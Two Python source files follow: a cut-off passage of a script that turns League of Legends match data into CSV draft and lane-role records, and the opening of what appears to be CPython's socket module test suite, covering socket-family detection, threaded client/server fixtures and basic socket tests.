ex = available_extractors.pop()
p = multiprocessing.Process(target=analyze_game, args=(ex, chunk,))
running_extractors.append((p, ex))
p.start()
for p, ex in running_extractors:
p.join()
stop.set()
writer.join()
print('-- Extraction complete --')
def analyze_game(ex, gamePaths):
for gamePath in gamePaths:
raw_data = OrderedDict([('s_' + champ, []) for champ in ex.mode.CHAMPIONS_LABEL] + [('p_' + champ, []) for champ in ex.mode.CHAMPIONS_LABEL])
raw_data['patch'] = []
raw_data['win'] = []
raw_data['file'] = []
print(ex.csv_file, gamePath)
game = pickle.load(open(gamePath, 'rb'))
bans = []
game_patch = '_'.join(game['gameVersion'].split('.')[:2])
if game['gameDuration'] < 300:
print(gamePath, 'FF afk', game['gameDuration'], file=sys.stderr)
ex.writing_q.put(gamePath)
continue
blueTeam = None
redTeam = None
for team in game['teams']:
if team['teamId'] == 100:
blueTeam = team
elif team['teamId'] == 200:
redTeam = team
else:
print(gamePath, 'Unrecognized team %d' % team['teamId'], file=sys.stderr)
break
for ban in team['bans']:
championId = ban['championId']
if championId not in bans:
bans.append(championId)
if not blueTeam or not redTeam:
print(gamePath, 'Teams are not recognized', file=sys.stderr)
ex.writing_q.put(gamePath)
continue
# not sure what is written for voided games, so it's safer to check both
# if we get something else than true/false or false/true we just ignore the file
blueWin = blueTeam['win'] == 'Win'
redWin = redTeam['win'] == 'Win'
if not blueWin ^ redWin:
print(gamePath, 'No winner found', blueWin, redWin, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
participants = game['participants']
# Blank, everything is available
state = OrderedDict()
state['win'] = int(blueWin)
state['patch'] = game_patch
state['file'] = os.path.basename(gamePath)
state.update([('s_' + champ_name, 'A') for champ_name in ex.mode.CHAMPIONS_LABEL]) # Status
state.update([('p_' + champ_name, 'N') for champ_name in ex.mode.CHAMPIONS_LABEL]) # Position
for key, value in state.items():
raw_data[key].append(value)
# Bans
state = OrderedDict(state) # don't forget to create a clean copy
for championId in bans:
for champ_name, champ_id in ex.mode.CHAMPIONS_ID.items():
if champ_id == championId:
state['s_' + champ_name] = 'N' # None
break
for key, value in state.items():
raw_data[key].append(value)
# Smart lane-role
# The Api doesn't precisely give players role, so we have to deduce it
b_roles = OrderedDict()
r_roles = OrderedDict()
for i in range(0, 10):
p = participants[i]
lane = p['timeline']['lane']
if i < 5:
if lane == 'TOP':
b_roles[i] = 'T'
elif lane == 'JUNGLE':
b_roles[i] = 'J'
elif lane == 'MIDDLE':
b_roles[i] = 'M'
elif lane == 'BOTTOM':
b_roles[i] = 'C'
elif lane == 'NONE':
b_roles[i] = '?' # Fill missing lane if possible
else:
raise Exception(p, lane)
else:
if lane == 'TOP':
r_roles[i] = 'T'
elif lane == 'JUNGLE':
r_roles[i] = 'J'
elif lane == 'MIDDLE':
r_roles[i] = 'M'
elif lane == 'BOTTOM':
r_roles[i] = 'C'
elif lane == 'NONE':
r_roles[i] = '?' # Fill missing lane if possible
else:
raise Exception(p, lane)
# Fill missing role '?'
# target at this point is something like 'T', 'J', 'M', 'C', 'C'
b_toFillCount = Counter(b_roles.values())['?']
if b_toFillCount > 1:
print(gamePath, 'fucked up roles', b_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
elif b_toFillCount == 1:
fill_index = list(b_roles.keys())[list(b_roles.values()).index('?')]
possible_roles = ['T', 'J', 'M', 'C']
missing_roles = list(set(possible_roles)-set(b_roles.values()))
if len(missing_roles) == 1:
# non-bot role
b_roles[fill_index] = missing_roles[0]
elif len(missing_roles) == 0:
# bot, whether it is support will be determined later
b_roles[fill_index] = 'C'
else:
print(gamePath, 'fucked up roles', b_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
r_toFillCount = Counter(r_roles.values())['?']
if r_toFillCount > 1:
print(gamePath, 'fucked up roles', r_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
elif r_toFillCount == 1:
fill_index = list(r_roles.keys())[list(r_roles.values()).index('?')]
possible_roles = ['T', 'J', 'M', 'C']
missing_roles = list(set(possible_roles)-set(r_roles.values()))
if len(missing_roles) == 1:
# non-bot role
r_roles[fill_index] = missing_roles[0]
elif len(missing_roles) == 0:
# bot, whether it is support will be determined later
r_roles[fill_index] = 'C'
else:
print(gamePath, 'fucked up roles', r_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
# need to find the support in both team
# a lane will appear twice, most likely 'C'
# the support will either be tagged as 'SUPPORT' or have a low cs count
b_doubleRole = Counter(b_roles.values()).most_common(1)[0][0]
b_doublei = [i for i, r in b_roles.items() if r == b_doubleRole]
if len(b_doublei) > 2:
print(gamePath, 'fucked up roles', b_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
if 'SUPPORT' in participants[b_doublei[0]]['timeline']['role']:
b_roles[b_doublei[0]] = 'S'
elif 'SUPPORT' in participants[b_doublei[1]]['timeline']['role']:
b_roles[b_doublei[1]] = 'S'
else: # Last resort -> check cs
if 'creepsPerMinDeltas' in participants[b_doublei[0]]['timeline']:
if participants[b_doublei[0]]['timeline']['creepsPerMinDeltas']['0-10'] < \
participants[b_doublei[1]]['timeline']['creepsPerMinDeltas']['0-10']:
b_roles[b_doublei[0]] = 'S'
else:
b_roles[b_doublei[1]] = 'S'
else:
if participants[b_doublei[0]]['stats']['totalMinionsKilled'] < participants[b_doublei[1]]['stats']['totalMinionsKilled']:
b_roles[b_doublei[0]] = 'S'
else:
b_roles[b_doublei[1]] = 'S'
r_doubleRole = Counter(r_roles.values()).most_common(1)[0][0]
r_doublei = [i for i, r in r_roles.items() if r == r_doubleRole]
if len(r_doublei) > 2:
print(gamePath, 'fucked up roles', r_roles, file=sys.stderr)
ex.writing_q.put(gamePath)
continue
if 'SUPPORT' in participants[r_doublei[0]]['timeline']['role']:
r_roles[r_doublei[0]] = 'S'
elif 'SUPPORT' in participants[r_doublei[1]]['timeline']['role']:
r_roles[r_doublei[1]] = 'S'
else: # Last resort -> check cs
if 'creepsPerMinDeltas' in participants[r_doublei[0]]['timeline']:
if participants[r_doublei[0]]['timeline']['creepsPerMinDeltas']['0-10'] < \
participants[r_doublei[1]]['timeline']['creepsPerMinDeltas']['0-10']:
r_roles[r_doublei[0]] = 'S'
else:
r_roles[r_doublei[1]] = 'S'
else:
if participants[r_doublei[0]]['stats']['totalMinionsKilled'] < participants[r_doublei[1]]['stats']['totalMinionsKilled']:
r_roles[r_doublei[0]] = 'S'
else:
r_roles[r_doublei[1]] = 'S'
roles = OrderedDict()
roles.update(b_roles)
roles.update(r_roles)
# Draft
DRAFT_ORDER = [0, 5, 6, 1, 2, 7, 8, 3, 4, 9] # This is not exact. This order is not pick order but end-draft order: if some players
# trade, this order is wrong. Unfortunatelly there is no way to know the real pick order. So we just assume people don't trade often and
# that trading does not have a huge impact anyway.
for i in DRAFT_ORDER:
state = OrderedDict(state)
bluePick = i < 5
p = participants[i]
championId = p['championId']
for champ_name, champ_id in ex.mode.CHAMPIONS_ID.items():
if champ_id == championId:
state['s_' + champ_name] = 'B' if bluePick else 'R'
state['p_' + champ_name] = roles[i]
break
for key, value in state.items():
raw_data[key].append(value)
df = pd.DataFrame(raw_data, columns=ex.mode.COLUMNS)
if ex.csv_index + len(df) < ex.mode.DATA_LINES:
df.to_csv(ex.csv_file, mode='a', header=False, index=False)
ex.csv_index += len(df)
else: # split the data in two: finish prev file and start another
to_current = df.iloc[:ex.mode.DATA_LINES - ex.csv_index]
to_next = df.iloc[ex.mode.DATA_LINES - ex.csv_index:]
to_current.to_csv(ex.csv_file, mode='a', header=False, index=False)
# preparing new file
ex.current_index += ex.rot_length
current_file = 'data_' + str(ex.current_index) + '.csv'
ex.csv_file = os.path.join(ex.mode.EXTRACTED_DIR, current_file)
ex.csv_index = 0
to_next.to_csv(ex.csv_file, mode='a', header=True, index=False)
ex.csv_index += len(to_next)
# File fully explored
ex.writing_q.put(gamePath)
if __name__ == '__main__':
m = Modes.ABR_TJMCS_Mode(['7.16', '7.17'])
run(m, max(multiprocessing.cpu_count() - 1, 1))
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
